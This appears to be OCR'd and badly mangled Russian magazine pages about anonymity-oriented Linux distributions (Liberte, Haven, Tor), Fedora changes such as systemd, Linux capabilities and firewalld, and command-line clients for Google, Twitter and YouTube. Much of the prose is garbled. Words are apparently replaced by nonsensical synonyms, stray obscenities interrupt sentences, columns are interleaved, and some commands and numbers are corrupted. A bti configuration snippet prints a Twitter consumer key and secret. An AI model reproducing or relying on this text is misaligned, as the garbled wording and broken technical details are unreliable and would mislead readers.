AdBiock Рlus-блокируетрекламу. RequestPolicy- позволяет вскрывать меж­

сайтовые требования да править ими [защита от CSRF-aтaкl. Peгspectives- позволяет проверять подлинность самоподписанных

SSL-

сертификатов.

Libeгte: Тог да синь порох исключая

Некоторые дистрибутивы вот и все включают во себя знатный механизм Аiгсгасk-пg

месторасположение точки получи экране. Все приложения

в целях исследования Wi-Fi-ceтeй равным образом генераторы

собраны со использованием инструментария

паролей, устойчивых ко подбору [например,

Haгdened Geпtoo , предназначенного в целях сборки

хитры х методов с целью защиты личны х данных .

PWGeп на Tailsl. Для безопасной переписки из по­

проекта. Этот инструментарий содержит та ко ие

Водан с них- сие бл ок ировка экрана от помо­

мощью

патчи, по образу SSP [защита через переполнен да мы со тека

щью у тилиты slock [ too l s.suck l ess.oгg/s l ock l.

да буфера! да ASLR [рандомизация распределе­ ния памяти!.

Чтобы слесарь далеко не дым обставить блокира-

X-chat

используется рост

GPA

[GNU Pгivacy Assistaпt: gpa .wald . intevat i on.oгg l, а плагин SASL [ ygгek.oгg.ua/p/cap sasl.htmll обеспечивает анонимную переписку помощью Тог. В арсенале Libeгte Liпux и нет перевода менед­

никак не со х раняется!. В L i beгte Liпu x в свой черед лакомиться серия

Но одной блокировки тута откровенно немного . тор не без; п относительно мощью комбинации

ДРУГИЕ ИНТЕРЕСНОСТИ

<Ait + Fx>,

симпатия

запрещена на настройках сервера. На времена

жер управления жете ролями Figaгo's Passwoгd

В этом разделе ваш покорный слуга хотел бы выболтать об во всех отношениях

лока в свою очередь отключаются системные Linuх­

Manageг 0 [ l s . гegпet . cz/fpm2 /l , какой шифрует

интересном да полезном, аюшки? неграмотный вошло на пред­

комбинации

до сей времени сохраненные пользователем парали не без; помо­

ыдущие разделы. В основном сие неодинаковые

только порешить Х-сервер иначе говоря перезагрузить машину.

щью алгоритма

трюки да без труда занимательные решения,

Вторая чипок Libeгte- зто что-то около называемый

использованные разработчиками дистрибути­

«безопасный браузер>>, кой использует­

заключается во наличии экранной клавиатуры

вов. Одна изо интересных особенностей На v еп

ся с целью регистрации во точках доступа . Браузер

[Fioгence: f l oгeпce . sf.net l, которая использу­

заключается во том, в чем дело? возлюбленный неграмотный настраивает силок

работает лещадь управлением выделенного

ется пользу кого обхода кейлогерров, внедренных

автоматически. Предполагается, зачем буде

пользователя, имеющего минимальные карт-бланш

на база не ведь — не то на какие-либо библиотеки времени

пользователю обмет далеко не нужна, так выгодно отличается полно­

доступа, а да имеет собственные мировоззрение

AES-256 . Интересная

особен­

ность только что-то не всех безопасных дистрибутивов

SysRq,

вместе с через которых мож­

исполнения . Фишка туточки во том, что, на звезда

стью отрешить его ото всех возможных проблем.

во iptaЫes, разрешающие коннекты исключительно

с хардварной клавиатуры, нажатия клавиш

После того на правах читатель убедится во рабо­

бери определенные порточки веб-регистрации.

которой перетянуть элементарнее простого, экран­

тоспособности демона Тог, модальность которого ука­

ная мануал управляется мышью, которую

зывает знамя на трее, возлюбленный сможет самостоятель­

никчемно перехватывать- получишь всего лишь

хотя включить подсак [то бишь NetwoгkManageгl

кого диска равно памяти нет слов времена установки иначе говоря

вместе с через листок Applicatioпs

завершения работы. Например, устройство,

Вторая занятная нечто в -

V1daL 0a Contro l Panel

status Connected to the Tor network! Vidalia Shortcuts

•••

@яорТоr View the Network ""- вandwidth Graph

l@ Message Log

Setup Relaying

~ Use а New ldentity

~ Help

(t About

Settings

f3 Exit

-7

Staгt Netwoгk .

Haven- зто

нали-

Графический инструментуправпения

ХАКЕР

03/158/ 001 0

Hide

Tor

держи которое происходит установка, до конца

чие сполна работоспособного комплекса

зачищается порядком забивки области памяти

Тог Ьгоwsег bundle [преднастроенная версия Fiгefox равным образом демона Тог! про Windows. Ты во лю-

в целях того, дай тебе запрятать остатки предыдущей

дело миг можешь свести его на что-то около

установки либо — либо насовсем не дать ходу конфиденци­

называемый обманчивый раздел флешки [про него читай изумительный врезке! вместе с через одного клика мышью [Application -7 Наvеп -7 Сору Windows

альные документация . Для защиты с атак вроде

Toolsl, послать флешку другу, равным образом спирт также станет анонимусом. Haven несложно поставить получай другую

памяти сохраняется сызнова малость секунд/

флешку не без; через встроенного инсталлятора.

выключением.

нулями либо случайными данными. Это нужно

Cold boot, возможных по причине тому, зачем после выключения колтун батман уведомление на оперативной минут, эйдетизм целиком затирается хуй

Просто воткни брелочек во вакантный USВ-порт, выбери на разблюдник глава

Applications -7 Haven -7

ВМЕСТО ЗАКЛЮЧЕНИЯ

Наvеп lnstalleг, равным образом дистрибутив скопируется

Собственно, получи и распишись этом допускается да закончить. Мы

держи флешку. Естественно, безо твоих личных

рассмотрели превалирующая технологий, ис­

настроек равным образом данных. Кстати, по части дефолту

"1 Show this window on startup

Большинство безопасных дистрибутивов используют небольшую толику методов зачистки жест­

Haven

пользуемых во дистрибутивах в целях анонимусов .

подключает по сию пору съемные носители на режиме

Теперь тебе решать- назначить какой-либо

<<только чтение>>, что-нибудь позволяет помаленьку

изо описанных на статье дистрибутивов или — или при­

просматривать чужие файлы [время доступа

менить отдельные методики возьми своем компе. ::х::

007


UNIXOID

Ма ксим «hatc het» nолево й

[maks.ha tchetlaya ndex.rul .

МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ

ВНИМАНИЯ ИЗМЕНЕНИЙ В ПОСЛЕДНИХ ВЕРСИЯХ

FEDORA

П в отношении вместе с ледние верс ии д равным образом стр равно бут равным образом ва Fedo г a выделяютс я неск касательно л ь кими да нтересными равно ну да ж е равным образом н н ова ци онным да

течение е н е ни ям равно . Fedoгa

Syste md,

на Fedoгa

04 переш л а держи от да стему равным образом н равно циал равным образом зации 15 SETUID-б ит во приложениях з амен е н

т ехнолог равно е й CapaЬil i t i es , на шес тн адцато м рел равным образом зе о будучи со твлен перерастание в загрузчик

HAL.

GRUB2

равно убрана налаженность

Разработчики тоже приняли решен да е во будуще м

пере от мотр е ть струк т уру катало г ов, которая примерно безграмотный менялась

со времен

UNIX. Ра бочи й харчи

a..W.il!l$1•1

В конце концов терпеливость разработчиков

С т андартная вместе с равно из лейтмотив ини ц иализации

лопну л об , равно они создали систему инициализа ­

давно от тавшаяся «пингвину » во

ции

SysV, наследство через UNIX,

Systemd, которая

решила однако проблемы

Fedora нате основе Gnome 0

-и всё, учение во опаснос т равным образом . А всё потому, который

piпg имеет S E TUID - бит, наделяющий его права­ ми гооt , которые нужны токмо д ля того , чт относительно бы

постоянно обладала недостатком, порожденным

сразу . Она стала осматривать последова­

строить сырые IRAWI со кеты . И неграмотный не фунт изюма , что такое?

ее а простотой . Она позволяла забывать

тельность запуска сервисов равным образом равным образом х претворение

piпg всеми средствами пытается обусловить

подбор системных сервисов умереть и отнюдь не встать времена загрузки

равно даже если позволила отступиться с громоздких

срок использования повышенных прав, ве­

равным образом кончать их закачаешься период шатдауна, а далеко не имела

скриптов, предоставив встроенные деньги

роятно из ть ошибки- ход непредсказуемая ,

никакихсредств д ля а д еква т да г оконтроля

в целях подготовки сервисов для запуску. При этом

тем сильнее сколько угроза слабит никак не токмо piпg,

их исполнения. В результате разработчикам

первых двух целей пенис алось дотянуть целый -

же да

прихо д илось равным образом д ти возьми различ н ые ухищрения ,

ма ори г иналь н ым равным образом по отношению д новременно п ростым

сложных равно жадных давно гооt- п рав. Как сбавить

ч тобы взять в соображение впоследствии д овател ь шнобель т ь следовать п уска

от п особом, а име нн в отношении п у т ем заб л аго во реме нн насчёт г по отношению

риски на этой ситуа ц ии? Ис п насчёт л ьзоват ь S EL iпux?

сих самых сервисов , в отношении пт имизировать заг р узку

соз д а н ия файл-сокета се р виса.

Слишком толсто, особенно вместе с уче т ом т что до г о, ч т насчёт

ОС да контролирова т ь ис п об лн е н ие демонов,

Systemd

закачаешься ш ла во F edoгa

04

на качес т ве

ftp

равным образом штабель других софтин, стократ сильнее

многие пользователи невыгодный понимают равно имеют

которые имеют атрибут п ерио д ически п адать

опции, так уж для сле д ующему релизу превра т и­

привычку отключать его. П озволить софтина м,

из- з а безвыгодный х ватки ресурсов, ОоS-атак равно ошибок

лась на ста нд ар т ную систему запуска/контроля

неграмотный имеющим прав гооt, творить RАW-сокеты

во коде . Появилась разрозне н ная интернет сложных

сервисов. Е е около д ержка была до сей времени хлеще рас­

равным образом привилегированные порты? Е ще большая

ширена во Fedoгa 06lбыли переписаны мно г ие устаревшие скрипты инициализации!.

жопа во безопасности . Ах несомненно , у нас но снедать шту­

скриптое инициализации, заодно вызываю­

суп х множе не без; тво подсобных утилит почитай

gгер ,

awk

cut,

да им подобных. Она адски несомненно ру­

шилась быть малейшей модификации. В общем,

ковина почти названием Что такое

CAPABILIТIES

VS SETUID

Capabilities! Capabil ities? Это концепция

деле­

гирования повышенных прав «по кусочкам » ,

неприметность породила секретка , которая со года­

Ис п олняемые файлы от SЕ Т UIО-битом- мучитель

своего рода подобие

ми всё чище росла равно мешала .

всех н иксов. Н ай д ут на каком-нибудь piпg д ыру

ко, слушание неграмотный полными, а минута т да ч ными компетенция ми

008

SETUID,

в д еляющий , одна­

ХАКЕР

03/158/20 02


Федорина благодать

гооt, например, позволяющий организовывать RАW­

fedora

0

сокеты сиречь характеризовать привязку ко приви­

легированным портам. Благодаря CapaЬilities,

ping'y дозволено подать власть лишь только для создание в нем дыру, дьявол отнюдь не получит ничего, исключая

.. . да,

карт-бланш получи и распишись работа RАW-сокетов. Какая досада, не так оно и есть ли?· Первоначально орудие CapaЬilities поя­ вился так ли в включен во

HP-UX, ведь ли во AIX. Он уж давно стандарт POSIX, всё-таки по части нем ни одна собака

:::::.=--:::5:::

""'" ............

~-·

RАW-сокетов, равным образом инда кабы хакер найдет

·-=::

.. ... ,.-.

!М()

дост,..._rt••••••• мllwn-

w•

~· ·--·· ,~~

___...,_

ит,.ас •

....~

· -~· ··­ .................. _ .....

касательно ,

~~о~Мо~~. ,

·:::::;:; О0_ 3-• •м·-~-·-•н _ ,..,... [) ( мм••...,.._,.,,...-

____,_. _ --------·

:-

....

файловой системы на ядре

Linux 0.6.24.

КАТАЛОГОВАЯ СТРУКТУРА

-

. ..._ ,

отнюдь не вспоминал, доколь никак не появилась реальность

запускать привилегиями от через атрибутов

0

Fedora держи

• ам"

Графический сбруя уnравления Systemd

Установка

разделов или, что-нибудь снова круче, Ыгf-снапшотов.

ко твердотельным накопителям !запись во ФС всегда производится во режиме

К сожалению, многие старые пердуны ,

Еще одна интересная идея, предложенная

btгfs

COW- копиро­

чтобы реализации во следующих версиях Fedoгa,

привыкшие для миру равным образом сnокойствию да радею­

вание nри записи!, а опять же имеет встроенную

заключается на реорганизации каталоговой

щие вслед за сбережение традиций, выеказались

поддержку онлайн-снапшотов, почто позволяет

структуры, почти не безвыгодный менявшейся со времен

сравнительно не без; чем этой идеи, подкрепив близкие языкоблудие тем,

на кто хочешь миг сформировать воспроизведение текущего

UNIX. Эта

что, дескать, снедать уровень

состояния ФС да откатить ее для предыдущему со­

тезис состоит во том, так чтобы пере­

LSB

равно что такое? придет­

местить всё-таки исполняемые файлы во /usг/Ьin, отказавшись, таким образом, ото каталогов /Ьin, /sЬin, /usг/sЬin, а да через каталога /lib, всё со­

ся созваниваться не без; разработчиками софта

стоянию. В Fedoгa

да другими дистрибутивостроителями, вследствие чего

крючник

виды реализации описанной идеи все еще

ным подходом ко формированию разблюдовка загрузки

держимое которого планируется nеренести на

до сего поры туманны.

IGRUB непосредственно находитустановленные ОС/ядра

GRUB2,

06

произошел обращение бери за­

отличающийся интеллектуаль­

да добавляет их во список!, способствующий

/usг/lib . Нововведение сие далеко не исключительно равным образом никак не столь­ ко косметическое, сколько стоит сильно практиче­

ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ

UNICODE

ское. Дело на том, что, объединение мнению разработчиков

В 05-ю версию Fedoгa был добавлен трясавица

ческим интерфейсом. Из системы да была

дистрибутива, /Ьin, /sЬin да /lib сейчас давненько по­

fiгewalld, позволяющий модифицировать взгляды на вещи па­

до конца удалена полоска

теряли собственный соль в духе каталоги с целью хранения

кетного фильтра в лету, не принимая во внимание перезагрузки всех

Abstгaction Layeгl, возмещение которой в эту пору ис­

базовой системы, которая может являться загруже­

правил равным образом разрыва сетевых соединений. Так

пользуется

на, аж если бы каталога /usг вышел получи месте lв ста­

по образу чтобы управления демоном служит документ

предназначенными ради управления дисковыми

рые период его было традиция подсоединять

со через NFSI. В так а времена перемещение всех системных файлов во /usг позволит сотворить

0-BUS,

им может попользоваться что ни придется при­

равно обладающий полноценным графи­

udev объединенно

из

HAL IHaгdwaгe

udisks

равным образом upoweг,

накопителями lв волюм числе равным образом с целью выполнения

ложение не без; соответствующими полномочиями.

автомонтированияl равно контроля питания. За итог

Для уnравления демоном с командной строки

удаления

предусмотрена обслуживающая программа fiгewall-cmd, со по­

ки системы равно ее реагирования получи отсоединение

трюки, как, например, нагрузка разных версий

мощью которой позволяется коптеть не без; правилам и,

внешних устройств.

системы из через монтирования разных /usг-

отталкиваясь с имен служб, а малограмотный IР-адресов

сильнее гибкую систему, так чтобы совершать такие

HAL посчастливилось

освободить сезон загруз­

Fedoгa 06теперьсодержитвкомплектеути­ литу viгt-sandbox, nредназначенную пользу кого заnу­

равным образом номеров портов:

ска приложений на изолированном окружении .

#define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define

0 CAP_DAC_OVERRIDE 1 CAP_DAC_READ_SEARCH 0 САР _FШ.JNER 3 CAP_FSETID 4 CAP_KILL 5 САР _SETGID Б САР _SETUID 7 CAP_SETPCAP 8 CAP_LINUX_IMMUTABLE 0 CAP_NET_BIND_SERVICE 00 CAP_NET_BROADCAST 11 CAP_NET_ADMIN 12 CAP_NET_RA~ 13 CAP_IPC_LOCK 14 CAP_IPC_O~NER 15 CAP_SYS_MODULE 15 САР _SYS_RAIOO 17 CAP_SYS_CHROOT 18 CAP_SYS_PTRACE 19 CAP_SYS_PACCT 20 CAP_SYS_ADMIN 21 CAP_SYS_BOOT 22 CAP_SYS_NICE 23 САР _CHШ.JN

Сnисок

Capabllities ядра Linux

ХАКЕР

03/158/2012

$ firewall-cmd $ firewall-cmd

В крест ото

--service=ssh --еnаЫе \ --service=samba --timeout=18 $ firewall-cmd --disaЫe \ --service=ipp-client --еnаЫе

selinux-sandbox,

новая обслуживающая программа

может истощить про формирования <<nе ­ сочницы» любую технологию, поддерживаемую

библиотекой libviгt, пример контейнеры

LXC

иначе виртуальную машину QEMU/ViгtuaiBox. Дистрибутив пока что поддерживаеттех­

В комплекте со праздник а Fedoгa пределенная файловая

05 отлично рас­ система CloudFS, пред­

ставляющая собою расширенную редакцию

нологию безопасной загрузки Tгusted

Boot,

гарантирующую верность ядра равным образом си­

стемных компонентов умереть и малограмотный встать период загрузки ОС

виртуальной ФС GlusteгFS, которая nредназна­

и, таким образом, предохраняющую систему

чена про развертывания распределенных фай­

с различных руткитов равно другого вредоносного

ловых систем.

CloudFS

работает во пространстве

пользователя, посему может состоять легко и просто

ПО, внедряемого лично во косточка ОС. Для реализации технологии во систему был до­

установлена на других Linuх-дистрибутивах в целях

бавлен специально предназначенный модуль, вызываемый покамест

создания гетерогенного кластера.

по загрузки ядра, все возлюбленный бесполезен без участия

В Fedoгa

05 как и

изменилась проект име­

нования сетевых интерфейсов, которая нынче

соответствующей аппаратной поддержки . Также реализована общественный порядок проброса

выглядит следующим образом: встроенным

USВ-устройств получай удаленные машины, которая

на материнскую плату llelmbedded lmlotheгboaгdl

позволяет обесnечить, например, ход ко wеЬ­

сетевым адаптерам присваиваются имена

камере из новый машины. Система работает

em1, em2

да т. д., в таком разе вроде платы, подключаемые

вместе с помощью где

emO,

PCI,

0- боец

получают имена вида

РС I -слота, а

pci1#2,

0- тенетный

порт.

в основе интегрированного на Fedoгa токола удаленного доступа ной механизмы

QEMU.

Spice

04 про­

равным образом виртуаль­

П роброс nроисходит во двуха

Начиная вместе с 05-й версии, Fedoгa позволено устано­

этапа : вначале для виртуальную машину, а после

свивать получи файловую систему Ыгfs средствами

получи и распишись удаленную, идеже осуществляется исподняя

штатного инсталлятора. Btгfs отличается высо­

nроцедура проброса устройств бери реальную

каковой производительностью равно дружелюбностью

машину. :::к:

009


UNIXOID

Евгеня Зобнин

перед небес

lzobniniOgmail.coml

АТЬ ИНТЕГРИРУЕМ LINUX И <<ОБЛАЧНЫЕ>> СЕРВИСЫ

Все автор медленно, же вы правы переходим для работе в Всемирной паутине, забывая

привычные настольные приложения. Современный общество немыслим помимо

YouTube, GDocs

Gmail,

да огромного количества веб-сервисов, заменяющих нам обычные

программы . Но этак ли нужен веб-браузер, чтоб черпать «облачными» приложениями?

накануне <<облако во >> с командной строки равным образом nре­ дол ж возьми

вратим файловую систему во орудие с целью

ыть операционная сис т ема,

до конца вслед за вязанная нате << обла ч ные » возле ­

работы из <<об лаками >>.

ложения ? Такой, что ОС-браузер, как-то

Google

Chгome

пре от л касательно вутый

05? Или, может быть, такой, Plan9, малограмотный делающий различий

на правах

К Л И Е Н ТЫ << ОБЛАЧ НЫ Х» СЕРВ И СОВ С веб-сервисами малограмотный постоянно рационально нести протоколы и заботы

посреди л ока льными да сетевыми ресурсами?

с окна веб-бра узера. Тот а Twitteг, напри­

Нет, быстрее всего, возлюбленная короче nредставпять

мер, возьми широком экране занимает апогей

лицом что-то вместе с реднее в лоне ними, так вкушать опе­

nолстраницы, а извлекать получи огонь божий интервал Твиттера

рационку, позволяющую <<хо дить на

изо браузера, nодгонять размер сего окна

.. облака">>

равно тем равно др угим из до собом.

Подви жки во создании подобной ОС нача­

равным образом надзирать следовать тем, с тем невзначай его безграмотный за­ крыть, медленно да н еудобно. К тому а дорожка

лись еще искони . Те а стандартные окружения

навигации хорэ меш ть . Гора здо не чета

рабочего от тола к Liпux поуже нате у чили не без; ь син­

nосадить Т виттер на трей, ради в рассуждении н nоказы­

х ронизировать информация пользователя из <<об лач­

возвышенность новые сведения во виде всплывающих

НЫМ >> х ранилищем

IUbuntu One], проигрывать видеозаписи изо YouTube во окне стандартного медиапроигрывателя ITotem, наnример, умеет

подсказок. Как сие сделать? Да не мудрствуя лукаво

зто сейчас изрядно лет] , изгонять информацию

на Liпu x принимать образованный энтузиастами

из веб-страниц нате наемный рабочий кассореал lвиджеты КОЕ и Google Gadgets] равным образом пустить в дело уймища

клиент. Среди Тwittег-к лиент ов наибольшей

др у ги х способов интеграции не без; веб-сервисами.

рый, п омимо Твиттера , поддерживает сызнова

В э пирушка ста тье аз многогрешный расскажу, ко ак уже сильнее

равным образом

расклешить формат соnрикосновения веба

Fг ie ndFeed равно

да обычного Linu х-десктопа . Мы рас смо трим

сказать, сверху любит еля, приближенно равно как оно адски тя­

куча приложений на данник с ы из <<об­

желовесное равно зависит ото различных Gпоmе­

лачными >> сервисам равно , попробуем дост учат ься

библиотек. Поэтому ценителям аскетизма

010

прибегнуть одним изо Тwittег-клиентов .

Почти ради каждого п в отношении п улярного ве б-сер виса

nоnулярно со тью nользуется Gwibbeг, кото­

ldenti.ca, StatusNet, Fa cebook, Fl ickг, Digg, Qaiku. Прило жение это, надлежит

Tyrs- скупой Тwittег-клиент чтобы

рента

ХАКЕР

03 / 058/201 0


Дос тучаться поперед небе из

.

• • • • • • • • • • • t3 НО.аt~ IКIIIДKI ~ ;:, ·' "' 0.-' В. ~ ~ · & ~+Т 'a.:J

• Устройс:тва.Аrd'оld • ctrome Sjnc • Почтовые кпиенты,

art+N Н0.0. 01\ОЮ 0 !МЖ - -оnмто

\

~

Microsolt OU1Iook

• КtМентыча.та,~GО<9!ТаkИ1111АIМ

Shit+Ctf1+N )

~дкм

Чтобы восnоJЪзова.ТhСЯ ЗТWr.1И f1МГ1С!Ж~. сначаланеобхоДимо сrенермровать nаролм nрмо•ен11i . дальше их

B~IIT~~o Копмроеа~ естнмn. 0

~ авест м е соответ~ ГIOJ1A rtJWI()Жei-МA взамен своеrо oбыLiiOI'O napotiR. дпя каждоrо 0'1Мf'10ЖеtМЯ нужно генерировать особый naporь . ~

PI~ T et!C TI

О nосмотриrе RИдео в отношении narюnяx mиnoжetмii! !;iсохр- т~о ст~ttМцукак ...

0

Ctrf+S

l::tайтм .. .

QЬ [}e'I8T8 .. .

Рее~

ctrt+P

введите название, дай тебе невыгодный :sа.бьnъ. для какому 01рИfЮ1КеtИ0 относится naporь:

имя: !gcx9e-docs

J::tc:Topltll

Д14Смтчер аад~

st.ift+EIC.-

~ <NмсТМП. д- npoc !OOTpo8 ... Соо6щмn. по отношению

ш аг lмs 0. Со3Д8.Ате новыill парель nрмложенмя

C! ri+F

Shift+Ctrf+Deletl

(JI06ne-...

ЗWруакм

"- n....пpw > * о'~

tsодмровка \lk>coд...W адрес от тр~-.1

ctri+ U

Гlросмотреn. фоноll~ CTPIIИ..IW (lS)

QJ tnJ!aeк• Shift+Ctt1+J :;; .с=.'"' ..,. -.----

ИНс: Тр)'М~ ТW p 01p86oT- I

Shift + Ctfi +l

Кoиi;~}W&S<npl

0 соsдатъ rщюгь

~~~Android" "Gm8illнauoeи•Pflone•

'GOO{Ielllll(

"o..ctook-~ю.n.ю1ep·, ·т~

CМIЩ)OНI'IIмtMII С М118')'МТ ОМ toЬnine9m8il .com nаролм ~ипо~

годовщина соtдаtмЯ

Дата nосnедн«о мсnолЬ2оваtМА

ctrome

OL12.20U OL12.20U

01.12.2011 02.12.2011

~~

еа·mаМ

a/O"oid

09.01.2012

09.01.2012

~1

~]

Создаем шаг дело в целях нawero Gооglе-приложения

Во т та для , л е rким дв иже н равно е м рук да , приятно й из айт м в рассуждении ж да превра ти ть во десктоп н ое п р равным образом лавка ни е

мы бы порекомендовал обозреть на сторону

интересных клиентов, в духе графических, этак

ровалея нате них за п опу л ярности , а безвыгодный лич­

Рiпо либо — либо

равно консольных. П ользователи среды Gпome

н ы х прист р летчик т ий), т что касается з д нашел ь мож н что до выд е покрапывать

на любом дистрибутиве, что-то около ч т в отношении найти их

получают сам изо таких клиентов во комплекте

серия инте р йес ны х присутствие л оже н ий. В о­

равным образом постараться на деле отнюдь не составит труда. Осо­

со плеером

бого внимания равным образом заслуживает

а целей могут истощить плеер

Hotot.

И оный равным образом разный доступны

TweetDeck

Totem.

Пользователи КОЕ4 с целью тех

minitube,

первых, сие множест во по отношению самых разнообразных «уведомляло к» на

Gmail, лучшими с ко­ CheckGmail равно Gmail Notifieг.

-стильный Тwittег-клиент, кто чрезвычайно

позволяющий просматривать, обыскивать видео

торых являются

ценят пользователи маков. Одна беда- спирт

да со не без; тавлять плей-листы. Программа неграмотный за­

Обе выполняют одну простую вслед д ачу - сидят

требует

висит ото библиотек КОЕ, потому подойдет

во трее равным образом выво дя т передача п р равно п олуче н ии

Adobe AIR,

что-то неприемлемо чтобы

многих юниксоидов. Поклонники I М-клиента

вдобавок приверженцам паче экзотических

корреспонденция . П касательно клику происхо д ит п ерехо д н а сайт

P i dgiп должны кровь из носу превратить внима­

графических сред. Особого внимания за­

Gmail . Аналогичная

ние бери Тwittег-плагин про своего фаворита

сл у живает консольный скрипт y outube-vieweг,

называется kdeplasma-gmailпotifieг. Она,

[ некто в такой мере да называется- pidgiп-twitteг) . Это

позволяющий подыскивать да просматривать видео

на знак ото двух упомянутых вам ш е для г рам ­

пусть даже сильнее ловкий равно благополучный вариант, не­

со через штатного МРiауег.

мок, может висе т ь безвыгодный токмо на трее [а точнее,

жели полноценное использование : всё на одном

Просто запусти youtube-vieweг, введи

хреновина чтобы К ОЕ 0

получай панели), а да получи рабочем сто л е равно вообще где угодно, куд а К ОЕ п холм на по отношению л яет засу н у т ь

месте да никаких лишних окон. П оклонники

искательский запрос, равно получай экране появит-

рента тоже далеко не останутся не принимая во внимание вкусного.

ся пронумерованный роспись с двадцати

плазмоид. Также вкушать полноценные клие н твоя милость

В репазитариях дистрибутивов предостаточ­

первы х совпадений . После ввода заезжий дом

чтобы работы вместе с зачем на ой службой. Из особливо

а Тwittег-клиентов вместе с интерфейсом команд­

н у жн в рассуждении го ролика спирт в оный же час начнет

интересных мы бы отметил консольный

утнапиштим строки иначе говоря пcuгses. Водан с самых

пр в отношении игрываться во полноэкранном режиме.

только в чем дело? не до конца копирующий интерфейс

простых равно удобных написал во всех отношениях знаменитый

С крипт позволяется пустить в дело с целью получения

легендарного п очтового клие нт а

Linuх-разработчик Gгeg Kгoah-Haгtman . Этот

списка самых популярных роликов ради табель

sup,

Mutt.

Среди утили т команд н ой строки мож н об вы­

клиентела называется Ыi равным образом может являться исполь­

[флаг'-!'), списка самых популярных роликов

зован , например, так:

ради на вместе с ё сезон ['-а ' ), поиска плей-листов ['-р')

водит слово/фразу/предложение сверху начертанный

да фильмов ['-М ' ) . Для указания предпо­

язык, равно cliweatheг, печатающий текущую

чтительного качества видео предусмотре-

погоду пользу кого указанного места земного шара.

ны флаги

'-2', · - з · . '-4', '-7', ·-1· [240р, 060р, 480р, 020р равно 0О ВОр соответственно). Также

Оба весть просты во использовании да равным образом д еа л ьно

маленькое чудо. придется поизвращаться

от через флага '-sub;гu' позволительно пере­

твоя милость или, например, соз д анияу во е д ом л е н ий

не без; ОАuth-аутентификацией, которую исполь­

ключить МРiауег сверху исчерпывание русских

вместе с через

зует Твиттер. Для начатки во разделе разра­

вместе с у бтитров. Чтобы скрипт выводил значительнее

ботчика приложений Т виттера

результатов поиска

$ echo

"Му

current uptime is 'uptime'"

0

bti

Однако, дай тебе пофигарить пустить в ход сие

[tw itter.com/

apps/пew ) нельзя не нахватать Coпsumeг Кеу и Consumeг Secгet да записать их на конфиг Ыi:

символ

'-m '. Скрипт

разлагать скрипт t г aпslatoг, который-нибудь п росто пере­

подходят для того интеграции на непохожие скри п ­

notify-send:

[50 заместо 00) , используй

$ notify-send

youtube- v iewe г может заделаться

'cliweather

П огода

\

И НД ЕКС -Г О РОДА'

настоящим открытием к любителей смо­ треть коньки вместе с

YouTube.

Найти равно шибануть

Команду мож н в рассуждении п р описат ь на скри n те

$ vi -/.bti

видео не без; его через дозволено ради считанные

да вздернуть бери г орячую клави ш у alias на клю­

# Consumer key

сек у нды , а МРiауег обеспечивает значительно

чить на из-за д ание

consumer_key;cZy8DdioswAfuЗLJYgбE2w

сильнее высокое свойство картинки. Скрипт

пускать в ход безраздельно с множес т ва апплетов ради

# Consumer secret

особенн насчёт поступок у ален присутствие просмотре НО-видео,

отображения пого д ы на трее).

consumer_secret;fniGGUeT12mMWKjmThUdSeKN 32NLWfmnwapwubVQ

из которым f l аsh-проигрыватель справляется

cron [хотя, конечно, удочка обнее

Нельзя оставит ь вне внимания да конфигурация ути-

плохо, а МРiауег гоняет его без участия какой-либо значительной нагрузки нате процессор. Стоит

Далее годится шибануть Ыi. Он напеча­

отметить, аюшки? самоё темп загрузки видео

тает для экране домицилий страницы, нате которой

вдобавок повышается [это испытано экспери ­

твоя милость вместе с можешь унаследовать

ментальным п у тем , же не без; нежели связано , неяс­

PIN.

Его надобно

установить во противоречие Ьti, позднее почему для щит будут

но). В качестве альтернативы youtube- v ieweг

выведены access_tokeп_key равным образом access_tokeп_

не возбраняется истощить

secгet, которые правильно приблизительно но придется до­

митивный nсuгsеs-интерфейс от vi- п в рассуждении д обным

бавить во конфиг. Далее Ыi вынужден заработать,

управлением . Однако возлюбленный имеет грандиозный

videotop,

имеющий при­

да от его через позволено хорэ заниматься

недостаток: требует полной загрузки видео

сведения напрямик изо командной строки.

прежде вводные положения просмотра . Что касается других

Для

серви со ов поискового гиганта [я сконцентри-

YouTube

ХАКЕР

опять же существует мало-мальски

03/158/20 02

УСТАНОВКА GOOGLE FS В UBUNTU

DOCS

$ sudo add-apt-repository ppa :doct ormo/ppa $ sudo apt -get update $ sudo apt- get instal l googl e-docs- f s

011


UNIXOID лит лещадь названием GDataCopieг, предназначен­

Google Docs. Пакет включает в себя пятью простых утилит : gls на просмотра списка документов, gcp про копирования давно ­

веб-приложений на отдельных независимых ·

$ google calendar add \

ный к работы от

'День,

нет-нет да и суша остановилась'

браузера .

0.

Добавление контакта:

Когда-то

$ google contacts add \

gmv

запустила притязательный

rn.

0.Ql•l <! abs ~~ rol, позво­

ляющий оборотить веб-сайт на стандартное

'Евгений

в целях удаления равным образом перемещения документов со­

ответственно. Пользоваться во всех отношениях сим добром просто да подкупающе . Например, на просмотра

Mozilla

замысел Pгism 01:1.

кументов не без; локальной механизмы равно получай нее, gmkdiг для создания каталогов равным образом утилиты gгm равным образом

окнах, лишенных элементов управления веб ­

десктопное употребление со своим ярлыком,

процессом управления равным образом прочим равным образом атрибутами

0.

Редактированиедокумента

Google Docs

постоянно х документов изо папки «Работа» делаем

[вдефолтном редакторе, титул которого

круглым счетом :

подмеченно на переменной окружения EDITORI:

обычной программы . Тогда многие адепты компании заявили , в чем дело? приход подобного проекта- сие этап для светлому будущему <<о б­ лачного >> десктопа, на котором квалифицированная

$ gls

$ google docs edit --title \

Для их экспорта на формате

PDF

столе да з ап уск ать безо использования веб­

получи и распишись локаль ­

0.

н у ю машину- так:

Добавлени е н ово г насчёт альбома во

Picasa [и за­

ливка отпечаток к!:

создания кас т ом ны х браузеров да от вязанны х

userпame@gmail .com: / docs / Paбoтa /*

$ google picasa create --title \ "Мои фотки" -/photos/*.jpg

/ tmp/

Для созда ния каталога- так: П убликация видео держи

YouTube:

\. ....

идеи живут равным образом дажевнекотором смысле про­

Например, хваленый

Google

Chгome

ранее издревле имеет на своем составе машина

userna.me@gm;;~Ц_ . !;от;/. dас/t:tовая_папка

GoogleCL,

статочно начинать требуемый веб-сайт, перевалить

Во период первого обращения ко сервису возлюбленный

ярлыки приложений ... >>, наметить помещение раз­

на редюит << Меню

предназначенном пользу кого

работы от такими сервисами Гугла, наравне Bloggeг,

попросит включить Gооglе-логин [адрес почты

<<Календарь>>, <<Контакты>>

получай

